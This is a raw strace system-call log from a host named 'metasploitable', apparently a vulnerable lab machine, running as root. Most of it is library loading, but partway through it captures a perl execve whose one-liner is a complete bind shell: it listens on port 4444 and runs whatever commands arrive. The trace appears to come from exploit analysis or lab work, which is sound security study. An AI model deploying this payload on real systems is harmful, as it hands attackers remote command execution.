12507 07:42:46.874371 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12507 07:42:46.874388 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de5000

12507 07:42:46.874399 mmap2(0xb7df9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7df9000

12507 07:42:46.874414 mmap2(0xb7dfb000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dfb000

12507 07:42:46.874428 close(1)          = 0

12507 07:42:46.874454 munmap(0xb7f8b000, 29913) = 0

12507 07:42:46.874471 open("/etc/ld.so.cache", O_RDONLY) = 1

12507 07:42:46.874483 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12507 07:42:46.874499 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f8b000

12507 07:42:46.874509 close(1)          = 0

12507 07:42:46.874520 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.874534 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12507 07:42:46.874548 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12507 07:42:46.874645 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12507 07:42:46.874663 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ddb000

12507 07:42:46.874674 mmap2(0xb7de3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7de3000

12507 07:42:46.874691 close(1)          = 0

12507 07:42:46.874703 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12507 07:42:46.874716 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

12507 07:42:46.874735 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12507 07:42:46.874824 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

12507 07:42:46.874842 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd0000

12507 07:42:46.874853 mmap2(0xb7dd9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd9000

12507 07:42:46.874869 close(1)          = 0

12507 07:42:46.874890 munmap(0xb7f8b000, 29913) = 0

12507 07:42:46.874905 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

12507 07:42:46.874919 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

12507 07:42:46.874931 _llseek(1, 0, [0], SEEK_CUR) = 0

12507 07:42:46.874943 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

12507 07:42:46.874959 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f92000

12507 07:42:46.874970 _llseek(1, 1624, [1624], SEEK_SET) = 0

12507 07:42:46.874984 munmap(0xb7f92000, 1624) = 0

12507 07:42:46.874994 close(1)          = 0

12507 07:42:46.875022 getpgrp()         = 3831

12507 07:42:46.875032 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

12507 07:42:46.875047 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

12507 07:42:46.875063 brk(0x8101000)    = 0x8101000

12507 07:42:46.875093 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12507 07:42:46.875108 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12507 07:42:46.875122 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12507 07:42:46.875190 brk(0x8102000)    = 0x8102000

12507 07:42:46.875231 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12507 07:42:46.875250 stat64("/sbin/AB", 0xbfbf5248) = -1 ENOENT (No such file or directory)

12507 07:42:46.875263 stat64("/bin/AB", 0xbfbf5248) = -1 ENOENT (No such file or directory)

12507 07:42:46.875274 stat64("/usr/sbin/AB", 0xbfbf5248) = -1 ENOENT (No such file or directory)

12507 07:42:46.875286 stat64("/usr/bin/AB", 0xbfbf5248) = -1 ENOENT (No such file or directory)

12507 07:42:46.875299 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12507 07:42:46.875314 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e066f8) = 12508

12508 07:42:46.875357 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12508 07:42:46.875375 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12508 07:42:46.875388 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12508 07:42:46.875400 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12508 07:42:46.875415 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12508 07:42:46.875431 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12508 07:42:46.875443 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12508 07:42:46.875498 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

12508 07:42:46.875512 --- SIGPIPE (Broken pipe) @ 0 (0) ---

12508 07:42:46.875578 exit_group(127)   = ?

4519  07:42:46.887090 waitpid(12507,  <unfinished ...>

12507 07:42:46.887130 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12507 07:42:46.897064 --- SIGCHLD (Child exited) @ 0 (0) ---

12507 07:42:46.897082 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12508

12507 07:42:46.897100 waitpid(-1, 0xbfbf4ec8, WNOHANG) = -1 ECHILD (No child processes)

12507 07:42:46.897111 sigreturn()       = ? (mask now [])

12507 07:42:46.897135 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12507 07:42:46.897150 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12507 07:42:46.897161 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

12507 07:42:46.897173 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

12507 07:42:46.897191 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12507 07:42:46.897202 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

12507 07:42:46.897238 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12507 07:42:46.897258 stat64("/sbin/perl", 0xbfbf5278) = -1 ENOENT (No such file or directory)

12507 07:42:46.897270 stat64("/bin/perl", 0xbfbf5278) = -1 ENOENT (No such file or directory)

12507 07:42:46.897282 stat64("/usr/sbin/perl", 0xbfbf5278) = -1 ENOENT (No such file or directory)

12507 07:42:46.897294 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12507 07:42:46.897311 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

12507 07:42:46.897337 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

12507 07:42:46.897351 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e066f8) = 12509

12509 07:42:46.897410 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12509 07:42:46.897426 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

12509 07:42:46.897439 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

12509 07:42:46.897451 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

12509 07:42:46.897466 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12509 07:42:46.897481 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12509 07:42:46.897494 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

12509 07:42:46.897537 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

12509 07:42:46.897628 brk(0)            = 0x8153000

12509 07:42:46.897649 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.897664 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000

12509 07:42:46.897680 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.897698 open("/etc/ld.so.cache", O_RDONLY) = 1

12509 07:42:46.897712 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12509 07:42:46.897729 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fd2000

12509 07:42:46.897739 close(1)          = 0

12509 07:42:46.897750 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.897765 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12509 07:42:46.897780 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12509 07:42:46.897876 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12509 07:42:46.897894 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fce000

12509 07:42:46.897906 mmap2(0xb7fd0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fd0000

12509 07:42:46.897922 close(1)          = 0

12509 07:42:46.897933 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.897947 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

12509 07:42:46.897961 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

12509 07:42:46.898101 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

12509 07:42:46.898119 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fa9000

12509 07:42:46.898131 mmap2(0xb7fcc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fcc000

12509 07:42:46.898147 close(1)          = 0

12509 07:42:46.898159 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.898173 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

12509 07:42:46.898187 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

12509 07:42:46.898274 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

12509 07:42:46.898290 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fa8000

12509 07:42:46.898303 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f90000

12509 07:42:46.898314 mmap2(0xb7fa4000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7fa4000

12509 07:42:46.898328 mmap2(0xb7fa6000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fa6000

12509 07:42:46.898345 close(1)          = 0

12509 07:42:46.898357 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.898370 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12509 07:42:46.898384 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12509 07:42:46.898472 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12509 07:42:46.898490 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e41000

12509 07:42:46.898501 mmap2(0xb7f8a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f8a000

12509 07:42:46.898523 mmap2(0xb7f8d000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f8d000

12509 07:42:46.898565 close(1)          = 0

12509 07:42:46.898577 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12509 07:42:46.898605 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

12509 07:42:46.898619 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

12509 07:42:46.898708 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

12509 07:42:46.898725 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0f000

12509 07:42:46.898736 mmap2(0xb7e18000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e18000

12509 07:42:46.898751 mmap2(0xb7e1a000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e1a000

12509 07:42:46.898764 close(1)          = 0

12509 07:42:46.898788 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e0e000

12509 07:42:46.898801 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e0e8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12509 07:42:46.898860 mprotect(0xb7f8a000, 4096, PROT_READ) = 0

12509 07:42:46.898891 munmap(0xb7fd2000, 29913) = 0

12509 07:42:46.898904 set_tid_address(0xb7e0e908) = 12509

12509 07:42:46.898913 set_robust_list(0xb7e0e910, 0xc) = 0

12509 07:42:46.898923 futex(0xbf989620, 0x81 /* FUTEX_??? */, 1) = 0

12509 07:42:46.898937 rt_sigaction(SIGRTMIN, {0xb7f942c0, [], SA_SIGINFO}, NULL, 8) = 0

12509 07:42:46.898950 rt_sigaction(SIGRT_1, {0xb7f94340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

12509 07:42:46.898962 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

12509 07:42:46.898976 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

12509 07:42:46.898994 uname({sys="Linux", node="metasploitable", ...}) = 0

12509 07:42:46.899050 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

12509 07:42:46.899097 brk(0)            = 0x8153000

12509 07:42:46.899106 brk(0x8174000)    = 0x8174000

12509 07:42:46.899150 getuid32()        = 0

12509 07:42:46.899160 geteuid32()       = 0

12509 07:42:46.899169 getgid32()        = 0

12509 07:42:46.899178 getegid32()       = 0

12509 07:42:46.899215 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ded000

12509 07:42:46.899243 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

12509 07:42:46.899260 read(1, "R_*\225", 4) = 4

12509 07:42:46.899273 close(1)          = 0

12509 07:42:46.899291 time(NULL)        = 1495626166

